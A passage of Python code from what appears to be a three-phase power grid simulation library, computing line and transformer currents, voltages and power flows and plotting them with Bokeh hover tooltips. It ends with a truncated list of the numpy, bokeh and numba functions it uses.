line.update({'i_j_n_m':np.abs(I_n)})
line.update({'deg_j_a':np.angle(I_a, deg=True)})
line.update({'deg_j_b':np.angle(I_b, deg=True)})
line.update({'deg_j_c':np.angle(I_c, deg=True)})
line.update({'deg_j_n':np.angle(I_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_a)})
line.update({'i_k_b_m':np.abs(I_b)})
line.update({'i_k_c_m':np.abs(I_c)})
line.update({'i_k_n_m':np.abs(I_n)})
line.update({'deg_k_a':np.angle(I_a, deg=True)})
line.update({'deg_k_b':np.angle(I_b, deg=True)})
line.update({'deg_k_c':np.angle(I_c, deg=True)})
line.update({'deg_k_n':np.angle(I_n, deg=True)})
if line['type'] == 'pi':
N_conductors = len(line['bus_j_nodes'])
if N_conductors == 3:
I_j_a = I_lines[it_single_line+0,0]+I_lines[it_single_line+3,0]
I_j_b = I_lines[it_single_line+1,0]+I_lines[it_single_line+4,0]
I_j_c = I_lines[it_single_line+2,0]+I_lines[it_single_line+5,0]
I_k_a = I_lines[it_single_line+0,0]-I_lines[it_single_line+6,0]
I_k_b = I_lines[it_single_line+1,0]-I_lines[it_single_line+7,0]
I_k_c = I_lines[it_single_line+2,0]-I_lines[it_single_line+8,0]
#I_n = (I_lines[it_single_line+3,0])
I_j_n = I_j_a+I_j_b+I_j_c
I_k_n = I_k_a+I_k_b+I_k_c
alpha = alpha = np.exp(2.0/3*np.pi*1j)
i_z = 1/3*(I_j_a+I_j_b+I_j_c)
i_p = 1.0/3.0*(I_j_a + I_j_b*alpha + I_j_c*alpha**2)
i_n = 1.0/3.0*(I_j_a + I_j_b*alpha**2 + I_j_c*alpha)
it_single_line += N_conductors*3
line.update({'i_j_a_m':np.abs(I_j_a)})
line.update({'i_j_b_m':np.abs(I_j_b)})
line.update({'i_j_c_m':np.abs(I_j_c)})
line.update({'i_j_n_m':np.abs(I_j_n)})
line.update({'deg_j_a':np.angle(I_j_a, deg=True)})
line.update({'deg_j_b':np.angle(I_j_b, deg=True)})
line.update({'deg_j_c':np.angle(I_j_c, deg=True)})
line.update({'deg_j_n':np.angle(I_j_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_k_a)})
line.update({'i_k_b_m':np.abs(I_k_b)})
line.update({'i_k_c_m':np.abs(I_k_c)})
line.update({'i_k_n_m':np.abs(I_k_n)})
line.update({'deg_k_a':np.angle(I_k_a, deg=True)})
line.update({'deg_k_b':np.angle(I_k_b, deg=True)})
line.update({'deg_k_c':np.angle(I_k_c, deg=True)})
line.update({'deg_k_n':np.angle(I_k_n, deg=True)})
line.update({'i_z':np.abs(i_z)})
line.update({'i_p':np.abs(i_p)})
line.update({'i_n':np.abs(i_n)})
if N_conductors == 4:
I_j_a = I_lines[it_single_line+0,0]+I_lines[it_single_line+3,0]
I_j_b = I_lines[it_single_line+1,0]+I_lines[it_single_line+4,0]
I_j_c = I_lines[it_single_line+2,0]+I_lines[it_single_line+5,0]
I_k_a = I_lines[it_single_line+0,0]-I_lines[it_single_line+6,0]
I_k_b = I_lines[it_single_line+1,0]-I_lines[it_single_line+7,0]
I_k_c = I_lines[it_single_line+2,0]-I_lines[it_single_line+8,0]
I_j_n = I_lines[it_single_line+3,0]
I_k_n = I_lines[it_single_line+3,0]
#I_n = (I_lines[it_single_line+3,0])
I_j_n = I_j_a+I_j_b+I_j_c
I_k_n = I_k_a+I_k_b+I_k_c
alpha = alpha = np.exp(2.0/3*np.pi*1j)
i_z = 1/3*(I_j_a+I_j_b+I_j_c)
i_p = 1.0/3.0*(I_j_a + I_j_b*alpha + I_j_c*alpha**2)
i_n = 1.0/3.0*(I_j_a + I_j_b*alpha**2 + I_j_c*alpha)
it_single_line += N_conductors*3
line.update({'i_j_a_m':np.abs(I_j_a)})
line.update({'i_j_b_m':np.abs(I_j_b)})
line.update({'i_j_c_m':np.abs(I_j_c)})
line.update({'i_j_n_m':np.abs(I_j_n)})
line.update({'deg_j_a':np.angle(I_j_a, deg=True)})
line.update({'deg_j_b':np.angle(I_j_b, deg=True)})
line.update({'deg_j_c':np.angle(I_j_c, deg=True)})
line.update({'deg_j_n':np.angle(I_j_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_k_a)})
line.update({'i_k_b_m':np.abs(I_k_b)})
line.update({'i_k_c_m':np.abs(I_k_c)})
line.update({'i_k_n_m':np.abs(I_k_n)})
line.update({'deg_k_a':np.angle(I_k_a, deg=True)})
line.update({'deg_k_b':np.angle(I_k_b, deg=True)})
line.update({'deg_k_c':np.angle(I_k_c, deg=True)})
line.update({'deg_k_n':np.angle(I_k_n, deg=True)})
def bokeh_tools(self):
self.bus_tooltip = '''
<div>
bus_id = @bus_id     | u<sub>avg</sub>= @u_avg_pu pu | u<sub>unb</sub>= @v_unb %
<table border="1">
<tr>
<td>v<sub>an</sub> = @v_an ∠ @deg_an V </td> <td> S<sub>a</sub> = @p_a + j@q_a kVA</td>
</tr>
<tr>
<td> </td> <td>v<sub>ab</sub>= @v_ab V</td>
</tr>
<tr>
<td>v<sub>bn</sub> = @v_bn ∠ @deg_bn V </td><td> S<sub>b</sub> = @p_b + j@q_b kVA</td>
</tr>
<tr>
<td> </td><td>v<sub>bc</sub>= @v_bc V</td>
</tr>
<tr>
<td>v<sub>cn</sub> = @v_cn ∠ @deg_cn V </td> <td>S<sub>c</sub> = @p_c + j@q_c kVA </td>
</tr>
<tr>
<td> </td> <td>v<sub>ca</sub>= @v_ca V</td>
</tr>
<tr>
<td>v<sub>ng</sub> = @v_ng ∠ @deg_ng V</td> <td>S<sub>abc</sub> = @p_abc + j@q_abc kVA </td>
</tr>
</table>
</div>
'''
x = [item['pos_x'] for item in self.buses]
y = [item['pos_y'] for item in self.buses]
bus_id = [item['bus'] for item in self.buses]
v_an = ['{:2.2f}'.format(float(item['v_an'])) for item in self.buses]
v_bn = ['{:2.2f}'.format(float(item['v_bn'])) for item in self.buses]
v_cn = ['{:2.2f}'.format(float(item['v_cn'])) for item in self.buses]
v_ng = ['{:2.2f}'.format(float(item['v_ng'])) for item in self.buses]
sqrt3=np.sqrt(3)
u_avg_pu = []
v_unb = []
for item in self.buses:
V_base = float(item['U_kV'])*1000.0/sqrt3
v_an_float = float(item['v_an'])
v_bn_float = float(item['v_bn'])
v_cn_float = float(item['v_cn'])
v_ng_float = float(item['v_ng'])
v_abc = np.array([v_an_float,v_bn_float,v_cn_float])
v_avg = np.average(v_abc)
unb = float(np.max(np.abs(v_abc-v_avg))/v_avg)
v_avg_pu = float(v_avg/V_base)
u_avg_pu += ['{:2.3f}'.format(v_avg_pu)]
v_unb += ['{:2.1f}'.format(unb*100)]
v_an_pu = ['{:2.4f}'.format(float(item['v_an'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
v_bn_pu = ['{:2.4f}'.format(float(item['v_bn'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
v_cn_pu = ['{:2.4f}'.format(float(item['v_cn'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
v_ng_pu = ['{:2.4f}'.format(float(item['v_ng'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
deg_an = ['{:2.2f}'.format(float(item['deg_an'])) for item in self.buses]
deg_bn = ['{:2.2f}'.format(float(item['deg_bn'])) for item in self.buses]
deg_cn = ['{:2.2f}'.format(float(item['deg_cn'])) for item in self.buses]
deg_ng = ['{:2.2f}'.format(float(item['deg_ng'])) for item in self.buses]
v_ab = [item['v_ab'] for item in self.buses]
v_bc = [item['v_bc'] for item in self.buses]
v_ca = [item['v_ca'] for item in self.buses]
p_a = ['{:2.2f}'.format(float(item['p_a']/1000)) for item in self.buses]
p_b = ['{:2.2f}'.format(float(item['p_b']/1000)) for item in self.buses]
p_c = ['{:2.2f}'.format(float(item['p_c']/1000)) for item in self.buses]
q_a = ['{:2.2f}'.format(float(item['q_a']/1000)) for item in self.buses]
q_b = ['{:2.2f}'.format(float(item['q_b']/1000)) for item in self.buses]
q_c = ['{:2.2f}'.format(float(item['q_c']/1000)) for item in self.buses]
p_abc = ['{:2.2f}'.format(float((item['p_a'] +item['p_b']+item['p_c'])/1000)) for item in self.buses]
q_abc = ['{:2.2f}'.format(float((item['q_a'] +item['q_b']+item['q_c'])/1000)) for item in self.buses]
s_radio = []
s_color = []
for item in self.buses:
p_total = item['p_a'] + item['p_b'] + item['p_c']
q_total = item['q_a'] + item['q_b'] + item['q_c']
s_total = np.abs(p_total + 1j*q_total)
scale = self.s_radio_scale
s_scaled = abs(np.sqrt(s_total))*scale
if s_scaled<self.s_radio_min :
s_scaled = self.s_radio_min
if s_scaled>self.s_radio_max:
s_scaled = self.s_radio_max
s_radio += [s_scaled]
if p_total>0.0:
s_color += ['red']
if p_total<0.0:
s_color += ['green']
if p_total==0.0:
s_color += ['blue']
self.bus_data = dict(x=x, y=y, bus_id=bus_id, u_avg_pu=u_avg_pu, v_unb=v_unb,
v_an=v_an, v_bn=v_bn, v_cn=v_cn, v_ng=v_ng,
v_an_pu=v_an_pu, v_bn_pu=v_bn_pu, v_cn_pu=v_cn_pu,
deg_an=deg_an, deg_bn=deg_bn, deg_cn=deg_cn,
deg_ng=deg_ng,v_ab=v_ab,v_bc=v_bc,v_ca=v_ca,
p_a=p_a,p_b=p_b,p_c=p_c,
q_a=q_a,q_b=q_b,q_c=q_c,
p_abc=p_abc,q_abc=q_abc,
s_radio=s_radio, s_color=s_color)
self.line_tooltip = '''
<div>
line id = @line_id
<table border="1">
<tr>
<td>I<sub>a</sub> = @i_a_m ∠ @deg_a A</td>
</tr>
<tr>
<td>I<sub>b</sub> = @i_b_m ∠ @deg_b A</td>
</tr>
<tr>
<td>I<sub>c</sub> = @i_c_m ∠ @deg_c A</td>
</tr>
<tr>
<td>I<sub>n</sub> = @i_n_m ∠ @deg_n A</td>
</tr>
</table>
</div>
'''
self.line_tooltip = '''
<div>
line id = @line_id
<table border="5">
<tr >
<td>I<sub>ja</sub> = @i_j_a_m ∠ @deg_j_a </td>
<td>I<sub>ka</sub> = @i_k_a_m ∠ @deg_k_a </td>
</tr>
<tr>
<td >I<sub>jb</sub> = @i_j_b_m ∠ @deg_j_b </td>
<td >I<sub>kb</sub> = @i_k_b_m ∠ @deg_k_b </td>
</tr>
<tr>
<td >I<sub>jc</sub> = @i_j_c_m ∠ @deg_j_c </td>
<td >I<sub>kc</sub> = @i_k_c_m ∠ @deg_k_c </td>
</tr>
<tr>
<td >I<sub>jn</sub> = @i_j_n_m ∠ @deg_j_n </td>
<td >I<sub>kn</sub> = @i_k_n_m ∠ @deg_k_n </td>
</tr>
</table>
</div>
'''
bus_id_to_x = dict(zip(bus_id,x))
bus_id_to_y = dict(zip(bus_id,y))
x_j = [bus_id_to_x[item['bus_j']] for item in self.lines]
y_j = [bus_id_to_y[item['bus_j']] for item in self.lines]
x_k = [bus_id_to_x[item['bus_k']] for item in self.lines]
y_k = [bus_id_to_y[item['bus_k']] for item in self.lines]
x_s = []
y_s = []
for line in self.lines:
x_s += [[ bus_id_to_x[line['bus_j']] , bus_id_to_x[line['bus_k']]]]
y_s += [[ bus_id_to_y[line['bus_j']] , bus_id_to_y[line['bus_k']]]]
i_j_a_m = [item['i_j_a_m'] for item in self.lines]
i_j_b_m = [item['i_j_b_m'] for item in self.lines]
i_j_c_m = [item['i_j_c_m'] for item in self.lines]
i_j_n_m = [item['i_j_n_m'] for item in self.lines]
i_k_a_m = [item['i_k_a_m'] for item in self.lines]
i_k_b_m = [item['i_k_b_m'] for item in self.lines]
i_k_c_m = [item['i_k_c_m'] for item in self.lines]
i_k_n_m = [item['i_k_n_m'] for item in self.lines]
deg_j_a = [item['deg_j_a'] for item in self.lines]
deg_j_b = [item['deg_j_b'] for item in self.lines]
deg_j_c = [item['deg_j_c'] for item in self.lines]
deg_j_n = [item['deg_j_n'] for item in self.lines]
deg_k_a = [item['deg_k_a'] for item in self.lines]
deg_k_b = [item['deg_k_b'] for item in self.lines]
deg_k_c = [item['deg_k_c'] for item in self.lines]
deg_k_n = [item['deg_k_n'] for item in self.lines]
line_id = ['{:s}-{:s}'.format(item['bus_j'],item['bus_k']) for item in self.lines]
# self.line_data = dict(x_j=x_j, x_k=x_k, y_j=y_j, y_k=y_k, line_id=line_id,
# i_a_m=i_a_m)
self.line_data = dict(x_s=x_s, y_s=y_s, line_id=line_id,
i_j_a_m=i_j_a_m, i_j_b_m=i_j_b_m, i_j_c_m=i_j_c_m, i_j_n_m=i_j_n_m,
i_k_a_m=i_k_a_m, i_k_b_m=i_k_b_m, i_k_c_m=i_k_c_m, i_k_n_m=i_k_n_m,
deg_j_a=deg_j_a, deg_j_b=deg_j_b, deg_j_c=deg_j_c, deg_j_n=deg_j_n,
deg_k_a=deg_k_a, deg_k_b=deg_k_b, deg_k_c=deg_k_c, deg_k_n=deg_k_n)
self.transformer_tooltip = '''
<div>
transformer id = @trafo_id
<table border="5">
<tr >
<td>I<sub>1a</sub> = @i_1a_m ∠ @deg_1a </td>
<td>I<sub>2a</sub> = @i_2a_m ∠ @deg_2a </td>
</tr>
<tr>
<td >I<sub>1b</sub> = @i_1b_m ∠ @deg_1b </td>
<td >I<sub>2b</sub> = @i_2b_m ∠ @deg_2b </td>
</tr>
<tr>
<td >I<sub>1c</sub> = @i_1c_m ∠ @deg_1c </td>
<td >I<sub>2c</sub> = @i_2c_m ∠ @deg_2c </td>
</tr>
<tr>
<td >I<sub>1n</sub> = @i_1n_m ∠ @deg_1n </td>
<td >I<sub>2n</sub> = @i_2n_m ∠ @deg_2n </td>
</tr>
</table>
</div>
'''
bus_id_to_x = dict(zip(bus_id,x))
bus_id_to_y = dict(zip(bus_id,y))
x_j = [bus_id_to_x[item['bus_j']] for item in self.transformers]
y_j = [bus_id_to_y[item['bus_j']] for item in self.transformers]
x_k = [bus_id_to_x[item['bus_k']] for item in self.transformers]
y_k = [bus_id_to_y[item['bus_k']] for item in self.transformers]
x_s = []
y_s = []
for line in self.transformers:
x_s += [[ bus_id_to_x[line['bus_j']] , bus_id_to_x[line['bus_k']]]]
y_s += [[ bus_id_to_y[line['bus_j']] , bus_id_to_y[line['bus_k']]]]
i_1a_m = [item['i_1a_m'] for item in self.transformers]
i_1b_m = [item['i_1b_m'] for item in self.transformers]
i_1c_m = [item['i_1c_m'] for item in self.transformers]
i_1n_m = [item['i_1n_m'] for item in self.transformers]
i_2a_m = [item['i_2a_m'] for item in self.transformers]
i_2b_m = [item['i_2b_m'] for item in self.transformers]
i_2c_m = [item['i_2c_m'] for item in self.transformers]
i_2n_m = [item['i_2n_m'] for item in self.transformers]
deg_1a = [item['deg_1a'] for item in self.transformers]
deg_1b = [item['deg_1b'] for item in self.transformers]
deg_1c = [item['deg_1c'] for item in self.transformers]
deg_1n = [item['deg_1n'] for item in self.transformers]
deg_2a = [item['deg_2a'] for item in self.transformers]
deg_2b = [item['deg_2b'] for item in self.transformers]
deg_2c = [item['deg_2c'] for item in self.transformers]
deg_2n = [item['deg_2n'] for item in self.transformers]
trafo_id = ['{:s}-{:s}'.format(item['bus_j'],item['bus_k']) for item in self.transformers]
# self.line_data = dict(x_j=x_j, x_k=x_k, y_j=y_j, y_k=y_k, line_id=line_id,
# i_a_m=i_a_m)
self.transformer_data = dict(x_s=x_s, y_s=y_s, trafo_id=trafo_id,
i_1a_m=i_1a_m, i_1b_m=i_1b_m, i_1c_m=i_1c_m, i_1n_m=i_1n_m,
deg_1a=deg_1a, deg_1b=deg_1b, deg_1c=deg_1c, deg_1n=deg_1n,
i_2a_m=i_2a_m, i_2b_m=i_2b_m, i_2c_m=i_2c_m, i_2n_m=i_2n_m,
deg_2a=deg_2a, deg_2b=deg_2b, deg_2c=deg_2c, deg_2n=deg_2n)
return self.bus_data
from bokeh.io import output_notebook, show
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource, HoverTool
from bokeh.io import push_notebook
from bokeh.resources import INLINE
output_notebook(INLINE)
def plot_results(grid):
#grid.bokeh_tools()
p = figure(width=600, height=400,
title='Results')
# trafos:
source = ColumnDataSource(grid.transformer_data)
trafo = p.multi_line(source=source, xs='x_s', ys='y_s', color="green", alpha=0.5, line_width=5)
# lines:
source = ColumnDataSource(grid.line_data)
lin = p.multi_line(source=source, xs='x_s', ys='y_s', color="red", alpha=0.5, line_width=5)
# buses:
source = ColumnDataSource(grid.bus_data)
cr = p.circle(source=source, x='x', y='y', size=15, color="navy", alpha=0.5)
p.add_tools(HoverTool(renderers=[trafo], tooltips=grid.transformer_tooltip))
p.add_tools(HoverTool(renderers=[lin], tooltips=grid.line_tooltip))
p.add_tools(HoverTool(renderers=[cr], tooltips=grid.bus_tooltip))
show(p)
return p
def get_flow(grid_obj,bus_j,bus_k,mode='total',model='pydgrid_pydae'):
if model == 'pydgrid_pydae':
v_a = grid_obj.get_values(f'v_{bus_j}_a_r') + 1j* grid_obj.get_values(f'v_{bus_j}_a_i')
i_l_a = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_a_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_a_i')
v_b = grid_obj.get_values(f'v_{bus_j}_b_r') + 1j* grid_obj.get_values(f'v_{bus_j}_b_i')
i_l_b = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_b_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_b_i')
v_c = grid_obj.get_values(f'v_{bus_j}_c_r') + 1j* grid_obj.get_values(f'v_{bus_j}_c_i')
i_l_c = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_c_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_c_i')
s_a = v_a*np.conj(i_l_a)
s_b = v_b*np.conj(i_l_b)
s_c = v_c*np.conj(i_l_c)
if mode == 'total':
s_t = s_a + s_b + s_c
return s_t
if mode == 'abc':
return s_a,s_b,s_c
def set_voltage(grid_obj,bus_name,voltage,phase):
'''
Set new power to a grid feeder.
Parameters
----------
grid_obj : object of pydgrid.grid class
bus_name : string
name of the grid feeder bus.
voltage : real escalar
phase-phase RMS voltage magnitude
phase : real escalar.
phase angle in degree.
Returns
-------
None.
'''
v_a = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase))
v_b = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase-240))
v_c = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase-120))
grid_obj.set_value(f'v_{bus_name}_a_r',v_a.real)
grid_obj.set_value(f'v_{bus_name}_a_i',v_a.imag)
grid_obj.set_value(f'v_{bus_name}_b_r',v_b.real)
grid_obj.set_value(f'v_{bus_name}_b_i',v_b.imag)
grid_obj.set_value(f'v_{bus_name}_c_r',v_c.real)
grid_obj.set_value(f'v_{bus_name}_c_i',v_c.imag)
def set_voltages(grid_obj,bus_name,voltages,phases):
'''
Set new power to a grid feeder.
Parameters
----------
grid_obj : object of pydgrid.grid class
bus_name : string
name of the grid feeder bus.
voltage : real escalar
phase-phase RMS voltage magnitude
phase : real escalar.
phase angle in degree.
Returns
-------
None.
'''
if isinstance(phases, list):
v_a = voltages[0]*np.exp(1j*np.deg2rad(phases[0]))
v_b = voltages[1]*np.exp(1j*np.deg2rad(phases[1]))
v_c = voltages[2]*np.exp(1j*np.deg2rad(phases[2]))
else:
v_a = voltages[0]*np.exp(1j*np.deg2rad(phases))
v_b = voltages[1]*np.exp(1j*np.deg2rad(phases-240))
v_c = voltages[2]*np.exp(1j*np.deg2rad(phases-120))
grid_obj.set_value(f'v_{bus_name}_a_r',v_a.real)
grid_obj.set_value(f'v_{bus_name}_a_i',v_a.imag)
grid_obj.set_value(f'v_{bus_name}_b_r',v_b.real)
grid_obj.set_value(f'v_{bus_name}_b_i',v_b.imag)
grid_obj.set_value(f'v_{bus_name}_c_r',v_c.real)
grid_obj.set_value(f'v_{bus_name}_c_i',v_c.imag)
def phasor2inst(grid_obj,bus_name,magnitude='v',to_bus='',phases=['a','b','c'],Freq = 50,Dt=1e-4):
omega = 2*np.pi*Freq
out = []
if magnitude == 'v':
for ph in phases:
Times = np.arange(0.0,grid_obj.T[-1,0],Dt)
R = grid_obj.get_values(f'{magnitude}_{bus_name}_{ph}_r')
I = grid_obj.get_values(f'{magnitude}_{bus_name}_{ph}_i')
R_ = np.interp(Times,grid_obj.T[:,0],R)
I_ = np.interp(Times,grid_obj.T[:,0],I)
R_I = R_ + 1j*I_
cplx = np.sqrt(2)*np.exp(1j*omega*Times)*R_I
out += [cplx.real]
if magnitude == 'iline':
for ph in phases:
Times = np.arange(0.0,grid_obj.T[-1,0],Dt)
R = grid_obj.get_values(f'i_l_{bus_name}_{to_bus}_{ph}_r')
I = grid_obj.get_values(f'i_l_{bus_name}_{to_bus}_{ph}_i')
R_ = np.interp(Times,grid_obj.T[:,0],R)
I_ = np.interp(Times,grid_obj.T[:,0],I)
R_I = R_ + 1j*I_
cplx = np.sqrt(2)*np.exp(1j*omega*Times)*R_I
out += [cplx.real]
return Times,out
def get_voltage(grid_obj,bus_name,output='v_an_m'):
'''
Get voltage module of a bus.
Parameters
----------
grid_obj : object of pydae class
bus_name : string
name of the bus.
output : string
v_an: a phase to neutral voltage phasor (V).
v_an_m: a phase to neutral RMS voltage (V).
v_abcn_m: a,b and c phases to neutral voltage phasors (V).
Returns
-------
phase-ground voltage module (V).
'''
if output in ['v_an','v_bn','v_cn']:
v_sub = f'v_{bus_name}_{output[-2]}'
v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i')
return v
if output in ['v_an_m','v_bn_m','v_cn_m']:
v_sub = f'v_{bus_name}_{output[-2]}'[:-2]
v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i')
return np.abs(v)
if output in ['v_abcn']:
v_list = []
for ph in ['a','b','c']:
v_sub = f'v_{bus_name}_{ph}'
v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i')
v_list += [v]
return np.array(v_list).reshape((3,1))
@numba.njit(cache=True)
def abc2pq(times,v_a,v_b,v_c,i_a,i_b,i_c,omega=2*np.pi*50,theta_0=0.0):
N_t = len(times)
Dt = times[1]-times[0]
p = np.zeros((N_t,1))
q = np.zeros((N_t,1))
for it in range(len(times)):
theta = Dt*it*omega + theta_0
v_abc = np.array([[v_a[it]],[v_b[it]],[v_c[it]]])
T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)],
[-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]])
dq=T_p@v_abc;
v_d = dq[0]
v_q = dq[1]
theta = Dt*it*omega + theta_0
i_abc = np.array([[i_a[it]],[i_b[it]],[i_c[it]]])
T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)],
[-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]])
i_dq=T_p@i_abc;
i_d = i_dq[0]
i_q = i_dq[1]
p[it] = 3/2*(v_d*i_d + v_q*i_q)
q[it] = 3/2*(v_d*i_q - v_q*i_d)
return p,q
@numba.njit(cache=True)
def abc2dq(times,v_a,v_b,v_c,i_a,i_b,i_c,omega=2*np.pi*50,theta_0=0.0,K_p=0.1,K_i=20.0,T_f=20.0e-3):
N_t = len(times)
Dt = times[1]-times[0]
v_d = np.zeros((N_t,1))
v_q = np.zeros((N_t,1))
i_d = np.zeros((N_t,1))
i_q = np.zeros((N_t,1))
p = np.zeros((N_t,1))
q = np.zeros((N_t,1))
theta = 0.0
xi = 0.0
theta_pll = np.zeros((N_t,1))
omega_pll = np.zeros((N_t,1))
dq = np.zeros((2,1))
idx = np.argmax(times>0.08)
theta_pll[0,0] = theta_0
#omega_pll = np.zeros((N_t,1))
for it in range(len(times)-1):
theta = theta_pll[it,0]
v_abc = np.array([[v_a[it]],[v_b[it]],[v_c[it]]])
i_abc = np.array([[i_a[it]],[i_b[it]],[i_c[it]]])
T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)],
[-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]])
v_dq = T_p@v_abc;
i_dq = T_p@i_abc;
v_d[it+1,0] = v_d[it,0] + Dt/T_f*(v_dq[0,0] - v_d[it,0])
v_q[it+1,0] = v_q[it,0] + Dt/T_f*(v_dq[1,0] - v_q[it,0])
i_d[it+1,0] = i_d[it,0] + Dt/T_f*(i_dq[0,0] - i_d[it,0])
i_q[it+1,0] = i_q[it,0] + Dt/T_f*(i_dq[1,0] - i_q[it,0])
p[it] = 3/2*(v_d[it+1,0] *i_d[it+1,0] + v_q[it+1,0] *i_q[it+1,0] )
q[it] = 3/2*(v_q[it+1,0] *i_d[it+1,0] - v_d[it+1,0] *i_q[it+1,0] )
xi += Dt*v_dq[0,0]
omega_pll[it,0] = K_p * v_dq[0,0] + K_i * xi + omega
theta_pll[it+1,0] += theta_pll[it,0] + Dt*(omega_pll[it,0])
omega_pll[it+1,0] = K_p * v_dq[0,0] + K_i * xi + omega
return theta_pll,omega_pll,v_d,v_q,i_d,i_q,p,q
def change_line(system,bus_j,bus_k, *args,**kwagrs):
line = kwagrs
S_base = system.get_value('S_base')
line_name = f"{bus_j}_{bus_k}"
if 'X_pu' in line:
if 'S_mva' in line: S_line = 1e6*line['S_mva']
R = line['R_pu']*S_base/S_line # in pu of the system base
X = line['X_pu']*S_base/S_line # in pu of the system base
if 'X' in line:
U_base = system.get_value(f'U_{bus_j}_n')
Z_base = U_base**2/S_base
R = line['R']/Z_base # in pu of the system base
X = line['X']/Z_base # in pu of the system base
if 'X_km' in line:
U_base = system.get_value(f'U_{bus_j}_n')
Z_base = U_base**2/S_base
R = line['R_km']*line['km']/Z_base # in pu of the system base
X = line['X_km']*line['km']/Z_base # in pu of the system base
if 'Bs_km' in line:
U_base = system.get_value(f'U_{bus_j}_n')
Z_base = U_base**2/S_base
print('U_base',U_base,'Z_base',Z_base)
Y_base = 1.0/Z_base
Bs = line['Bs_km']*line['km']/Y_base # in pu of the system base
bs = Bs
system.set_value(f'bs_{line_name}',bs)
print(bs)
G = R/(R**2+X**2)
B = -X/(R**2+X**2)
system.set_value(f"g_{line_name}",G)
system.set_value(f"b_{line_name}",B)
def get_line_i(system,bus_from,bus_to,U_kV=66e3):
if f"b_{bus_from}_{bus_to}" in system.params_list:
bus_j = bus_from
bus_k = bus_to
current_direction = 1.0
elif f"b_{bus_to}_{bus_from}" in system.params_list:
bus_j = bus_to
bus_k = bus_from
current_direction = -1.0
else:
print(f'No line from {bus_from} to {bus_to}')
return
line_name = f"{bus_j}_{bus_k}"
V_j_m = system.get_value(f"V_{bus_j}")
theta_j = system.get_value(f"theta_{bus_j}")
V_k_m = system.get_value(f"V_{bus_k}")
theta_k = system.get_value(f"theta_{bus_k}")
V_j = V_j_m*np.exp(1j*theta_j)
V_k = V_k_m*np.exp(1j*theta_k)
Y_jk = system.get_value(f"g_{line_name}") + 1j*system.get_value(f"b_{line_name}")
S_base = system.get_value('S_base')
U_base = system.get_value(f"U_{bus_j}_n")
I_jk_pu = current_direction*Y_jk*(V_j - V_k)
I_base = S_base/(np.sqrt(3)*U_base)
I_jk = I_jk_pu*I_base
return I_jk
def get_line_s(system,bus_from,bus_to,U_kV=66e3):
if f"b_{bus_from}_{bus_to}" in system.params_list:
bus_j = bus_from
bus_k = bus_to
current_direction = 1.0
elif f"b_{bus_to}_{bus_from}" in system.params_list:
bus_j = bus_to
bus_k = bus_from
current_direction = -1.0
else:
print(f'No line from {bus_from} to {bus_to}')
return
line_name = f"{bus_j}_{bus_k}"
V_j_m = system.get_value(f"V_{bus_j}")
theta_j = system.get_value(f"theta_{bus_j}")
V_k_m = system.get_value(f"V_{bus_k}")
theta_k = system.get_value(f"theta_{bus_k}")
V_j = V_j_m*np.exp(1j*theta_j)
V_k = V_k_m*np.exp(1j*theta_k)
Y_jk = system.get_value(f"g_{line_name}") + 1j*system.get_value(f"b_{line_name}")
S_base = system.get_value('S_base')
U_base = system.get_value(f"U_{bus_j}_n")
I_jk_pu = current_direction*Y_jk*(V_j - V_k)
I_base = S_base/(np.sqrt(3)*U_base)
I_jk = I_jk_pu*I_base
S_jk_pu = V_j*np.conj(I_jk_pu)
S_jk = S_base*S_jk_pu
return S_jk
def set_powers(grid_obj,bus_name,s_cplx,mode='urisi_3ph'):
'''
Function for simplifying the power setting.
Parameters
----------
grid_obj : pydae object
pydae object with grid of type pydgrid.
bus_name : string
name of the bus to xhange the power.
s_cplx : TYPE
complex power (negative for load, positive for generated).
Returns
-------
None.
'''
if mode == 'urisi_3ph':
p = s_cplx.real
q = s_cplx.imag
for ph in ['a','b','c']:
grid_obj.set_value(f'p_{bus_name}_{ph}',p/3)
grid_obj.set_value(f'q_{bus_name}_{ph}',q/3)
if mode == 'urisi_abc':
p = s_cplx.real
q = s_cplx.imag
for ph in ['a','b','c']:
grid_obj.set_value(f'p_{bus_name}_{ph}',p/3)
grid_obj.set_value(f'q_{bus_name}_{ph}',q/3) | [
"numpy.sqrt",
"bokeh.plotting.figure",
"numpy.array",
"numpy.sin",
"numpy.arange",
"pydae.tools.get_v",
"numpy.exp",
"numpy.vstack",
"numpy.abs",
"bokeh.io.show",
"json.loads",
"collections.namedtuple",
"numpy.average",
"numpy.conj",
"pydae.tools.get_i",
"numba.njit",
"numpy.argmax",
"numpy.deg2rad",
"bokeh.models.ColumnDataSource",
"numpy.cos",
"numpy.interp",
"bokeh.models.HoverTool",
"numpy.copy",
"bokeh.io.output_notebook",
